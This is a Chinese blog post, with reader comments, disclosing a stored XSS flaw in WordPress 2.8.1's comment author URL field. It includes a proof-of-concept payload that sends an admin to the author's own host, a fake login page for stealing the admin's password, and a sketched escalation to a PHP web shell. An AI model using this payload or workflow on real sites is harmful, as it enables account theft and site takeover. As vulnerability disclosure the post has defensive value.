WordPress 2.8.1 评论显示xss漏洞
# 鬼仔:前几天就已经开始有人拿我这里做测试了,这次发出来了,会不会拿我这里做测试的人更多?
作者:空虚浪子心 inbreak.net
ps:感谢鬼仔’s blog,XEYE’s blog协助测试。
实际上是个XSS漏洞。
POC:
在评论的网址一栏,填写
http://blog.sohu.com/fh8e3333211134333/f8e9wjfidsj3332dfs' onmousemove='location.href=String.fromCharCode(104,116,116,112,58,47,47,105,110,98,114,101,97,107,46,110,101,116,47,97,46,112,104,112);
这段代码仅供测试,是不能直接用的。
如果你拿我的shellcode去打别人的站,那密码就归我了,来之不拒啊。
管理员审核时,只要鼠标从url上路过,就会跳转到http://www.inbreak.net/a.php。
这里是个假的登录页面,钓鱼用。
管理员登录后,我们就能记录密码。
对于整个流程说明:
1,发评论让管理员对你的url有兴趣,然后等管理员上钩。
2,管理员在后台把鼠标移动到你的url上。
3,跳转到a.php,先获取referer。
4,输入密码后,提交到kxlzxtest/testxss/wp.php。
5,referer,user,pass保存为”域名.txt”。
6,输出一段JS,跳转到referer地址去。
a.php代码:
<?php
$website = $_SERVER['HTTP_REFERER'];
$website=strtolower($website);
$website=substr($website,7);
$website=substr($website,0,strpos($website,'/'));
//这个页面是用来冒充登录页面的,危害巨大,代码不方便提供。
?>
wp.php代码
嗯。。。本来打算和某个短信平台配合一下,给我发短信提醒的,后来因为懒,就没写。
SHELL代码
<?php
//被lv老子过滤。
?>
这只是个DEMO,实际上,后台有编辑PHP文件的功能,你可以写个AJAX出来,自动获取编辑插件文件的页面中的token字段(名字忘记了,叫做XXonce),之后提交一个PHP shell过去。就不用钓鱼了。
漏洞代码:
wordpress\wp-admin\includes\template.php
文件中的$author_url没有对单引号做过滤,最后又使用拼接href=’$author_url’。
导致我们可以添加一个这个href的事件函数进去。
PHP代码
2085:$author_url = get_comment_author_url();
2182:case 'author':
echo "<td $attributes><strong>"; comment_author(); echo '</strong><br />';
if ( !emptyempty($author_url) )
echo "<a title='$author_url' href='$author_url'>$author_url_display</a><br />";
前台的评论展示,也存在这个漏洞。
修补方式:
不建议自己手工修补,建议把评论暂时关闭,然后等官方补丁就是了。
到目前为止,官方可能还不知道。
语言不通,好心人看到同时,可以通知下官方。
汗,这个问题相当严重啊…
等wordpress282吧
问鬼仔一个问题
形如的跨站,如何让他包含一个远程js呢?
好象这里不能用var吧
希望早点公布完整代码
http://www.darkst.com/bbs/thread-46124-1-1.html貌似这个是我发现的吧,怎么面别人的了?
当时看到你在我这里测试了,但是我这边第一个来测试的是浪子,这篇文章也是浪子写的,当然就写浪子的名字了。
思想有多远,我就能走多远
理解了,以后发东西找个有名点的发。
倒不是这个意思,的确是浪子告诉我的,而且这篇文章也是转浪子的,肯定要写浪子的名字。
好文章!!!
汗,技术掌握在少数人的手中!!!看不懂
技术贴,暂没用WP程序。
不懂,,,,,,,,,,
学习了。
技术贴。
仔仔,准备调试更新WordPress 2.8.2 啦!
刚升级了
我来测试撑破页面的 你们牛人继续聊你们的
呵呵 2.71 有么? 只是2.81?
空虚这家伙挖漏洞还是不错的。
呵呵
扯蛋啊 这样用处不大 笨一点的管理应该就看不出那个假入口了
Auto BlogRoll2.2 XSS漏洞.插件没有对输入的字符串进行关键字过滤,导致可以输入’ 等字符。并且在利用插件本身的小工具和页面输出时也没有做特殊字符过滤。导致可以输入特殊构造的网站名等进行攻击。
博客开多了。发错了,郁闷啊,请博主原谅
问题大吗?